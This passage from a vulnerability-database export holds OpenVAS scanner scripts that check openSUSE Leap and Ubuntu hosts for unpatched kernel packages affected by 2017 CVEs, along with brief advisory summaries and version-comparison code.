2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851632\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-02 18:05:41 +0530 (Thu, 02 Nov 2017)\");\n script_cve_id(\"CVE-2017-13080\", \"CVE-2017-15265\", \"CVE-2017-15649\", \"CVE-2017-6346\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2846-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE Leap 42.3 kernel was updated\n to 4.4.92 to receive various security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2) allowed\n reinstallation of the Group Temporal Key (GTK) during the group key\n handshake, allowing an attacker within radio range to replay frames from\n access points to clients (bnc#1063667).\n\n - CVE-2017-15265: Race condition in the ALSA subsystem in the Linux kernel\n allowed local users to cause a denial of service (use-after-free) or\n possibly have unspecified other impact via crafted /dev/snd/seq ioctl\n calls, related to sound/core/seq/seq_clientmgr.c and\n sound/core/seq/seq_ports.c (bnc#1062520).\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux kernel allowed local\n users to gain privileges via crafted system calls that trigger\n mishandling of packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that leads to a\n use-after-free, a different vulnerability than CVE-2017-6346\n (bnc#1064388).\n\n The following non-security bugs were fixed:\n\n - acpi/processor: Check for duplicate processor ids at hotplug time\n (bnc#1056230).\n\n - acpi/processor: Implement DEVICE operator for processor enumeration\n (bnc#1056230).\n\n - add mainline tags to hyperv patches\n\n - alsa: au88x0: avoid theoretical uninitialized access (bnc#1012382).\n\n - alsa: compress: Remove unused variable (bnc#1012382).\n\n - alsa: usb-audio: Check out-of-bounds access by corrupted buffer\n descriptor (bnc#1012382).\n\n - alsa: usx2y: Suppress kernel warning at page allocation failures\n (bnc#1012382).\n\n - arm64: add function to get a cpu's MADT GICC table (bsc#1062279).\n\n - arm64: dts: Add Broadcom Vulcan PMU in dts (fate#319481).\n\n - arm64/perf: Access pmu register using read/write gt _sys_reg\n (bsc#1062279).\n\n - arm64/perf: Add Broadcom Vulcan PMU support (fate#319481).\n\n - arm64/perf: Changed events naming as per the ARM ARM (fate#319481).\n\n - arm64/perf: Define complete ARMv8 recommended implementation defined\n events (fate#319481).\n\n - arm64: perf: do not expose CHAIN event in sysfs (bsc#1062279).\n\n - arm64: perf: Extend event config for ARMv8.1 (bsc#1062279).\n\n - arm64/perf: Filter common events based on PMCEIDn_EL0 (fate#319481).\n\n - arm64: perf: Ignore exclude_hv when kernel is running in HYP\n (bsc#1062279).\n\n - arm64: perf: move to common attr_group fields (bsc#1062279).\n\n - arm64: perf: Use the builtin_platform_driver (bsc#1062279).\n\n - arm64: pmu: add fallback probe table (bsc#1062279).\n\n - arm64: pmu: Hoist pmu platform device name (bsc#1062279).\n\n - a ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"Linux Kernel on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2846-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~4.4.92~31.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-html\", rpm:\"kernel-docs-html~4.4.92~31.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-pdf\", rpm:\"kernel-docs-pdf~4.4.92~31.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build\", rpm:\"kernel-obs-build~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build-debugsource\", rpm:\"kernel-obs-build-debugsource~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa\", rpm:\"kernel-obs-qa~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base-debuginfo\", rpm:\"kernel-vanilla-base-debuginfo~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~4.4.92~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:26:51", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-10-30T00:00:00", "id": "OPENVAS:1361412562310851638", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851638", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2905-1)", "type": "openvas", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851638\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-10-30 09:25:38 +0100 (Mon, 30 Oct 2017)\");\n script_cve_id(\"CVE-2017-13080\", \"CVE-2017-15265\", \"CVE-2017-15649\", \"CVE-2017-6346\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2905-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE Leap 42.2 kernel was updated to 4.4.92 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2) allowed\n reinstallation of the Group Temporal Key (GTK) during the group key\n handshake, allowing an attacker within radio range to replay frames from\n access points to clients (bnc#1063667).\n\n - CVE-2017-15265: Race condition in the ALSA subsystem in the Linux kernel\n allowed local users to cause a denial of service (use-after-free) or\n possibly have unspecified other impact via crafted /dev/snd/seq ioctl\n calls, related to sound/core/seq/seq_clientmgr.c and\n sound/core/seq/seq_ports.c (bnc#1062520).\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux kernel allowed local\n users to gain privileges via crafted system calls that trigger\n mishandling of packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that leads to a\n use-after-free, a different vulnerability than CVE-2017-6346\n (bnc#1064388).\n\n The following non-security bugs were fixed:\n\n - alsa: au88x0: avoid theoretical uninitialized access (bnc#1012382).\n\n - alsa: compress: Remove unused variable (bnc#1012382).\n\n - alsa: usb-audio: Check out-of-bounds access by corrupted buffer\n descriptor (bnc#1012382).\n\n - alsa: usx2y: Suppress kernel warning at page allocation failures\n (bnc#1012382).\n\n - arm: 8635/1: nommu: allow enabling REMAP_VECTORS_TO_RAM (bnc#1012382).\n\n - arm: dts: r8a7790: Use R-Car Gen 2 fallback binding for msiof nodes\n (bnc#1012382).\n\n - arm: remove duplicate 'const' annotations' (bnc#1012382).\n\n - asoc: dapm: fix some pointer error handling (bnc#1012382).\n\n - asoc: dapm: handle probe deferrals (bnc#1012382).\n\n - audit: log 32-bit socketcalls (bnc#1012382).\n\n - blacklist 0e7736c6b806 powerpc/powernv: Fix data type for @r in\n pnv_ioda_parse_m64_window()\n\n - blacklist.conf: not fitting cleanup patch\n\n - brcmfmac: setup passive scan if requested by user-space (bnc#1012382).\n\n - bridge: netlink: register netdevice before executing changelink\n (bnc#1012382).\n\n - ceph: avoid panic in create_session_open_msg() if utsname() returns NULL\n (bsc#1061451).\n\n - ceph: check negative offsets in ceph_llseek() (bsc#1061451).\n\n - driver core: platform: Do not read past the end of 'driver_override'\n buffer (bnc#1012382).\n\n - drivers: firmware: psci: drop duplicate const from psci_of_match\n (bnc#1012382).\n\n - drivers: hv: fcopy: restore correct transfer length (bnc#1012382).\n\n - drm/amdkfd: fix improper return value on error (bnc#1012382).\n\n - drm: bridge: add DT bind ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"Linux Kernel on openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2905-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~4.4.92~18.36.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-html\", rpm:\"kernel-docs-html~4.4.92~18.36.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-pdf\", rpm:\"kernel-docs-pdf~4.4.92~18.36.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build\", rpm:\"kernel-obs-build~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build-debugsource\", rpm:\"kernel-obs-build-debugsource~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa\", rpm:\"kernel-obs-qa~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base-debuginfo\", rpm:\"kernel-vanilla-base-debuginfo~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~4.4.92~18.36.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:27", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-08-11T00:00:00", "id": "OPENVAS:1361412562310843274", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843274", "title": "Ubuntu Update for linux-hwe USN-3384-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3384_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-hwe USN-3384-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843274\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-11 07:22:29 +0200 (Fri, 11 Aug 2017)\");\n script_cve_id(\"CVE-2017-1000112\", \"CVE-2017-1000111\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-hwe USN-3384-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-hwe'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3384-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 17.04. This update provides the corresponding updates\n for the Linux Hardware Enablement (HWE) kernel from Ubuntu 17.04 for Ubuntu\n 16.04 LTS. Andrey Konovalov discovered a race condition in the UDP Fragmentation\n Offload (UFO) code in the Linux kernel. A local attacker could use this to cause\n a denial of service or execute arbitrary code. (CVE-2017-1000112) Andrey\n Konovalov discovered a race condition in AF_PACKET socket option handling code\n in the Linux kernel. A local unprivileged attacker could use this to cause a\n denial of service or possibly execute arbitrary code. (CVE-2017-1000111)\");\n script_tag(name:\"affected\", value:\"linux-hwe on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3384-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3384-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-32-generic\", ver:\"4.10.0-32.36~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-32-generic-lpae\", ver:\"4.10.0-32.36~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-32-lowlatency\", ver:\"4.10.0-32.36~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.10.0.32.34\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.10.0.32.34\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.10.0.32.34\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:37", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-08-11T00:00:00", "id": "OPENVAS:1361412562310843278", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843278", "title": "Ubuntu Update for linux-lts-xenial USN-3385-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3385_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-xenial USN-3385-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843278\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-11 07:22:44 +0200 (Fri, 11 Aug 2017)\");\n script_cve_id(\"CVE-2017-1000112\", \"CVE-2017-1000111\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3385-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3385-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for\n Ubuntu 14.04 LTS. Andrey Konovalov discovered a race condition in the UDP\n Fragmentation Offload (UFO) code in the Linux kernel. A local attacker could 